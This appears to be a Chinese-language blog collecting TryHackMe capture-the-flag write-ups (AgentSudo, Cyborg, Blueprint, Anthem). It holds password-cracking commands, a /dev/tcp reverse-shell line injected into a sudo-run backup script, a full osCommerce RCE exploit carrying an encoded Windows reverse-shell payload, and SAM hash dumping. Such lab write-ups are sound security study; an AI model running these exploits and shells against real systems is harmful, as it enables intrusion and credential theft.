可以發現也是可以快速爆出密碼While more useful when interacting with a machine being used, what command allows us to watch the remote user’s desktop in real time?- 這題剛開始我以為是說螢幕截圖 screenshot
輸入完之後會自動的存一張即時的圖檔
不過後來發現他要是 real time，所以答案是 screenshare-
他會開一個 html 然後自動刷新、可以即時監看
How about if we wanted to record from a microphone attached to the system?- 監聽麥克風可以使用 record_micTo complicate forensics efforts we can modify timestamps of files on the system. What command allows us to do this? Don’t ever do this on a pentest unless you’re explicitly allowed to do so! This is not beneficial to the defending team as they try to breakdown the events of the pentest after the fact.- 竄改 timestamp 可以用 timestompMimikatz allows us to create what’s called a golden ticket, allowing us to authenticate anywhere with ease. What command allows us to do this?- golden_ticket_create可以透過 run post/windows/manage/enable_rdp 開啟RDP

AgentSudo (Try Hack Me Writeup)

Sat, 31 Jul 2021 23:44:00 +0800

URL: https://tryhackme.com/room/agentsudoctf

IP : 10.10.119.64

Recon

老梗 nmap -A 10.10.119.64
發現有開FTP
SSH
HTTP嘗試進入 HTTP-
看到他說需要在 useragent 放 Codename (機密代號)
又說 Dear agent, 下面有說 Agent R
所以基本上可以先猜測 Agent A 到 Z

爆猜機密代號

瀏覽器沒有太方便，所以我們先把瀏覽器 request 轉 curl
對著 F12 的 Reuest 右鍵，Copy as cURL
curl 'http://10.10.119.64/' -H 'User-Agent: meow' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1' -H 'Cache-Control: max-age=0, no-cache' -H 'Pragma: no-cache'curl 轉 Python request- 我使用這個網站 https://curl.trillworks.com/把 curl 貼上就可以自動轉 python 的 request 了接下來寫一段扣爆破因為如果猜錯他會回傳的字都是一樣的，那就猜測輸入正確時，他回傳的東西會不一樣，所以最簡單的方法可以用字串長度來比對，輸入錯誤時長度是 218 運氣很好，C 就猜到ㄌ

import requests

for i in "ABCDEFGHIJKLMNOPQRSTUVWXYZ":
 headers = {
 'User-Agent': i ,
 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
 'Accept-Language': 'en-US,en;q=0.5',
 'Connection': 'keep-alive',
 'Upgrade-Insecure-Requests': '1',
 'Cache-Control': 'max-age=0, no-cache',
 'Pragma': 'no-cache',
 }

 response = requests.get('http://10.10.119.64/', headers=headers).text
 print(i,len(response))

用 User-Agent:C 發 request在 Firefox 上使用右鍵， Edit and Resend- 修改 User-Agent 為 C 並送出可以發現他自動跳轉到這個網頁- http://10.10.119.64/agent_C_attention.php
內文中發現了 Agent C 叫做 chris
而且他的主管在嘴他說使用弱密碼

FTP

嘗試爆破 FTP因為 nmap 有掃到 ssh 跟 ftp，隨便取 ftp
透過 Hydra + Rockyou 字典來爆hydra -l chris -P /opt/rockyou.txt ftp://10.10.119.64可以了解到帳號為 chris密碼為 crystal嘗試登入 FTP- ftp 10.10.119.64
輸入 ls 觀察 ftp 裡面的檔案輸入 get 檔名 把檔案依序載下來觀察 txt 檔案- cat To_agentJ.txt
他說兩張照片都是假ㄉ，裡面有藏東東

Stego

起手式 stringsstrings cutie.png
可以發現裡面藏了一點點的字，但是用奇怪的編碼或加密QQ透過 binwalk 觀察是否裡面有藏檔案-
發現 png 後面塞了一個 zip透過 foremost 解出裡面的檔案- foremost cutie.png
會發現資料夾裡面有一包 zip
解壓縮 zip- 用最直覺的 unzip
會發現噴錯
跟據這篇的講法，可以用 7z 來解7z x 00000067.zip-
用 7z 解，會發現 zip 需要密碼爆破 zip 密碼- 先把 zip 轉成約翰格式
zip2john 00000067.zip > j.txt
john j.txt --wordlist=/opt/rockyou.txt
就可以取得密碼為 alien
解壓縮 zip- 7z x 00000067.zip
並使用密碼 alien 即可解壓完畢
解壓內容可以看到一組奇怪的密碼 QXJlYTUx
透過 base64 解碼base64 -d 即可獲得 Area51接下來看到另外一個檔案- cute-alien.jpg`
這邊使用 steghide 進行解密
steghide extract -sf cute-alien.jpg並搭配 Area51- 發現成功的解出了 message.txt
我們可以發現文章內- 使用者 : james
密碼 : hackerrules!

SSH

透過 SSH 進行登入ssh james@10.10.119.64
尋找到 user_flag.txt-
b03d975e8c92a7c04146cfa7a5a313c7

提權

輸入 sudo -l
所以我們不能以 root 身分執行/bin/bashWhat is the incident of the photo called?- 裡面還找到了一張照片
透過 Google 以圖搜圖可以找到這篇新聞
Roswell alien autopsy繼續提權- 透過 scp 上傳 Linpeas本機scp linpeas.sh james@10.10.119.64:/tmp
遠端- bash linpeas.sh | tee meow.txt可以觀察到 Linpeas 把 sudo 版本變紅色-
透過Google Sudo 1.8.21p2可以找到 CVE-2019-14287
https://www.exploit-db.com/exploits/47502遠端機器剛好有 python 跟 vim- 那就直接開 vim 把 exploit 給貼上
把 python exploit code 給 run 起來- 詢問使用者名稱，就輸入 james
成功提權!取得 root flag-
b53a02f55b57d4439e3341834d70c062(Bonus) Who is Agent R?- 信最後有寫 DesKel aka Agent R
阿不是阿，你名字裡哪裡有 R ㄌ ?__?

Cyborg (Try Hack Me Writeup)

Thu, 29 Jul 2021 23:58:00 +0800

URL : https://tryhackme.com/room/cyborgt8
IP : 10.10.210.57

Recon

老梗 nmap -A 10.10.210.5Scan the machine, how many ports are open?- 2What service is running on port 22?- SSHWhat service is running on port 80?- HTTP``python3 dirsearch.py -u http://10.10.210.57/ -e all- /admin/
/etc/

解密

先從 /etc/ 路徑開始看裡面有啥http://10.10.210.57/etc
找到路徑底下有一個 passwd- http://10.10.210.57/etc/squid/passwdmusic_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
看起來是 hash 格式，直接複製出來給約翰
john a.txt --wordlist=/opt/rockyou
帳號 : music_archive
密碼 : squidward

尋寶

去逛 /admin/發現有 Archive 可以下載
解開之後發現是一種奇怪格式-
檔案都是 binary 無法 print
Readme 提醒我們可以去看 https://borgbackup.readthedocs.io/
borg 是一種備份程式嘗試簡單的看完說明後- borg list .輸入密碼，剛剛約翰破出來的 squidward
可以看到一些資訊borg mount . ../a- 把檔案掛載起來
發現掛載的檔案裡面有 note-
alex:S3cretP@s3
看起來就很像帳密

進入系統

用 ssh 搭配帳密登入
取得 user flag
flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}嘗試提權- 先用 sudo -l 看我們有什麼權限
發現我們可以用 sudo 執行 /etc/mp3backups/backup.sh觀察權限-
發現我們是這個檔案的擁有者，但我們不能修改他
不過可以透過 chmod +w 新增 Write 權限插入 shell- echo "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'" >> /etc/mp3backups/backup.sh
直接用 reverse shell 插入檔案最下方執行 shell- 攻擊機開啟監聽nc -vlk 7877被駭機用 sudo 執行該檔案- sudo /etc/mp3backups/backup.sh拿到 root shell!- 貓根旗幟-
flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}

Blueprint (Try Hack Me Writeup)

Thu, 29 Jul 2021 23:55:00 +0800

URL : https://tryhackme.com/room/blueprint
IP : 10.10.66.7

Scan

一樣老梗 nmap -A 10.10.66.7 發現開了很多 port
80 port 進去是 404先放一邊

└─$ nmap -A 10.10.66.7
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-29 03:57 EDT
Nmap scan report for 10.10.66.7
Host is up (0.32s latency).
Not shown: 984 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 404 - File or directory not found.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Bad request!
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
1165/tcp filtered qsm-gui
1971/tcp filtered netop-school
3306/tcp open mysql MariaDB (unauthorized)
5190/tcp filtered aol
8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Index of /
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -20m00s, deviation: 34m36s, median: -1s
|_nbstat: NetBIOS name: BLUEPRINT, NetBIOS user: , NetBIOS MAC: 02:24:bb:82:08:6f (unknown)
| smb-os-discovery:
| OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1
| Computer name: BLUEPRINT
| NetBIOS computer name: BLUEPRINT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-07-29T08:58:58+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-29T07:58:57
|_ start_date: 2021-07-29T07:49:40

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 131.87 seconds

測試老洞445 port SMB 有開，又是 Windows 系統很直覺的掃一下老洞 MS17-010
https://github.com/3ndG4me/AutoBlue-MS17-010
發現打不進去 QQ觀察 web- 發現 8080 port 跟 443 port 的 web server 都指向同一個 web server
裡面有一個 oscommerce-2.3.4 路徑

Exploit

尋找 exploitGoogle oscommerce-2.3.4 Exploit
https://www.exploit-db.com/exploits/44374部屬 exploit- wget https://www.exploit-db.com/download/44374 -O 44374.py
修改路徑

# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
 base_url = "http://10.10.66.7:8080/oscommerce-2.3.4/catalog/"
 target_url = "http://10.10.66.7:8080/oscommerce-2.3.4/catalog/install/install.php?step=4"

修改指令payload += 'system("whoami");'
接著執行 44374.py
發現禁止 system嘗試 phpinfo()- 發現 disable_functions 只有禁止 system
這邊有非常多種繞過方法，例如passthru
shell_exec
exec在此取用 passthru再次嘗試 payload- payload += 'passthru("whoami");'
發現他直接吐了一個 system 給我!!準備戳 reverse shell- 找到一個 php windows reverse shellhttps://github.com/Dhayalanb/windows-php-reverse-shell/blob/master/Reverse%20Shell.php
基本上他的原理是寫檔，把base64轉成一隻exe跑起reverse shell拿來微調一下修改 ip、port、然後把 system 改 passthru放進 44374.py完整 exploit code

# Exploit Title: osCommerce 2.3.4.1 Remote Code Execution
# Date: 29.0.3.2018
# Exploit Author: Simon Scannell - https://scannell-infosec.net 
# Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
# Tested on: Linux, Windows

# If an Admin has not removed the /install/ directory as advised from an osCommerce installation, it is possible
# for an unauthenticated attacker to reinstall the page. The installation of osCommerce does not check if the page
# is already installed and does not attempt to do any authentication. It is possible for an attacker to directly
# execute the "install_4.php" script, which will create the config file for the installation. It is possible to inject
# PHP code into the config file and then simply executing the code by opening it.

import requests

# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
base_url = "http://10.10.66.7:8080/oscommerce-2.3.4/catalog/"
target_url = "http://10.10.66.7:8080/oscommerce-2.3.4/catalog/install/install.php?step=4"

data = {
 'DIR_FS_DOCUMENT_ROOT': './'
}

# the payload will be injected into the configuration file via this code
# ' define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
# so the format for the exploit will be: '); PAYLOAD; /*
# fsockopen("110.14.7.198",7877);popen("/bin/sh -i &3 2>&3", "r");
payload = '\'); \n'
# payload += 'echo passthru("type configure.php");'
payload += """
header('Content-type: text/plain');
$ip = "10.14.7.198"; //change this
$port = "7877"; //change this
$payload = "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";
$evalCode = gzinflate(base64_decode($payload));
$evalArguments = " ".$port." ".$ip;
$tmpdir ="C:\\windows\\temp";
chdir($tmpdir);
$res .= "Using dir : ".$tmpdir;
$filename = "D3fa1t_shell.exe";
$file = fopen($filename, 'wb');
fwrite($file, $evalCode);
fclose($file);
$path = $filename;
$cmd = $path.$evalArguments;
$res .= "\n\nExecuting : ".$cmd."\n";
echo $res;
$output = passthru($cmd);
"""

payload += '\n\n/*'

data['DB_DATABASE'] = payload

# exploit it
r = requests.post(url=target_url, data=data)

if r.status_code == 200:
 print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
else:
 print("[-] Exploit did not execute as planned")

本機端開 nc -vlk 7877 進行監聽php 端執行下去，就拿到 shell 了!!
由於我們是 system 權限- 所以可以直接拿 admin 的 Root flag
在 C:\Users\Administrator\Desktop\root.txt.txt我猜應該是出題者手殘之類的，不小心打了兩次 .txt 吧THM{aea1e3ce6fe7f89e10cea833ae009bee}

破密

題目說需要破 "Lab" user NTML hash decrypted我覺得題目打錯字，應該是說 NTLM 的 hash XD由於我們是 system 權限，很大，所以可以用指令直接匯出兩個 NTLM 相關檔案、SAM 與 SYSTEM- reg save HKLM\SAM C:\sam
reg save HKLM\SYSTEM C:\system接下來把兩個檔案傳回本機- 這邊我用的方法是，直接把這兩個檔案放到 web 路徑中，用wget來載
reverse shellcopy sam C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\include攻擊機- wget http://10.10.66.7:8080/oscommerce-2.3.4/catalog/install/includes/sam
wget http://10.10.66.7:8080/oscommerce-2.3.4/catalog/install/includes/user將 sam、system 轉為 john 格式- samdump2 system sam > j.txt
題目問 LAB 使用者，所以我們只需要保留這一行
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::而我們要破的真正 hash 是這個
30e87bf999828446a1c1209ddde4c450暴力破解- 其實暴力破解通常是下下策，往往會先試著Google之類尋找網路資源
不過我 Google 這段 hash 值卻出現了一堆爆雷的內容，只好自己破解QQ
通常我愛用 rockyou.txt 但在這邊破不出來
後來我採用了這一包https://github.com/danielmiessler/SecLists/blob/master/Passwords/xato-net-10-million-passwords-dup.txt
不要問我為什麼……隨便找ㄉjohn j.txt --wordlist=/opt/xato-net-10-million-passwords-dup.txt --format=NT爆出密碼 googleplus另外一種網路解法- https://crackstation.net/
輸入 30e87bf999828446a1c1209ddde4c450
回傳密碼為 googleplus

Anthem (Try Hack Me Writeup)

Thu, 29 Jul 2021 23:47:00 +0800

URL : https://tryhackme.com/room/anthem

IP : 10.10.18.8

這題感覺有點廢，但還是寫一下WP好ㄌ
機器開機要等將近5分鐘為什麼?
不知道，反正我等了5分鐘才有畫面
估計是因為 Windows 有點肥ㄅ

Recon

老梗 nmap -A 有開 80、3389
有抓到 robots.txt

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-28 21:42 EDT
Nmap scan report for 10.10.18.8
Host is up (0.28s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-robots.txt: 4 disallowed entries
|_/bin/ /config/ /umbraco/ /umbraco_client/
|_http-title: Anthem.com - Welcome to our blog
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WIN-LU09299160F
| NetBIOS_Domain_Name: WIN-LU09299160F
| NetBIOS_Computer_Name: WIN-LU09299160F
| DNS_Domain_Name: WIN-LU09299160F
| DNS_Computer_Name: WIN-LU09299160F
| Product_Version: 10.0.17763
|_ System_Time: 2021-07-29T01:42:55+00:00
| ssl-cert: Subject: commonName=WIN-LU09299160F
| Not valid before: 2021-07-28T01:38:13
|_Not valid after: 2022-01-27T01:38:13
|_ssl-date: 2021-07-29T01:43:01+00:00; +1s from scanner time.

robots.txt還有叫做 umbraco 的東西Google 後發現他是一種 CMS
看到一組奇怪密碼 UmbracoIsTheBest!

UmbracoIsTheBest!

 # Use for all search robots
 User-agent: *

 # Define the directories not to crawl
 Disallow: /bin/
 Disallow: /config/
 Disallow: /umbraco/
 Disallow: /umbraco_client/

回答問題

普通問題

What port is for the web server?80What port is for remote desktop service?- 3389What is a possible password in one of the pages web crawlers check for?- 他都說 crawlers 了，所以應該就是 robots.txt 的密碼
UmbracoIsTheBest!What CMS is the website using?- umbraco
robots.txt 上有寫What is the domain of the website?- anthem.com
首頁上就有

通靈問題

What’s the name of the AdministratorCMS 中有一篇文章這樣寫
http://10.10.18.8/archive/a-cheers-to-our-it-department/- Born on a Monday, Christened on Tuesday, Married on Wednesday, Took ill on Thursday, Grew worse on Friday, Died on Saturday, Buried on Sunday. That was the end…- 把字串丟去 Google 可以找到這篇文https://en.wikipedia.org/wiki/Solomon_Grundy_(nursery_rhyme)
所以 admin 叫做 Solomon_GrundyCan we find find the email address of the administrator?- 在某篇貼文中http://10.10.18.8/archive/we-are-hiring/貼文者叫做 Jane DoeEmail 是 : JD@anthem.com- 看起來規則是姓名各取一個字，都大寫 @anthem.com那 admin 這個- Solomon_Grundy 就 SG ㄅSG@anthem.com

Flag 們

我覺得這邊的 Flag 也都偏通靈沒有任何 web 技巧可言
就把整個網站繞一圈就能逛完Flag1- http://10.10.18.8/archive/we-are-hiring/
THM{L0L_WH0_US3S_M3T4}Flag2- http://10.10.18.8/
THM{G!T_G00D}Flag4- http://10.10.18.8/archive/a-cheers-to-our-it-department/
THM{AN0TH3R_M3TA}Flag3- http://10.10.18.8/authors/jane-doe/
THM{L0L_WH0_D15}

通靈登入

通靈登入使用帳號 : SG@anthem.com
密碼 : UmbracoIsTheBest!前面 robots.txt 找到ㄉ登入 http://10.10.18.8/umbraco通靈RDP- sudo apt install freerdp2-x11
帳號 : SG
密碼 : UmbracoIsTheBest!
xfreerdp +drives /u:SG /v:10.10.18.8:3389桌面上就有 user.txt-
THM{N00T_NO0T}

提權

開啟顯示隱藏檔案
逛到 c:\backup\restore他沒有讀取權限，但我們可以修改他的權限-
修改後點開可以看到以下字串- ChangeMeBaby1MoreTime
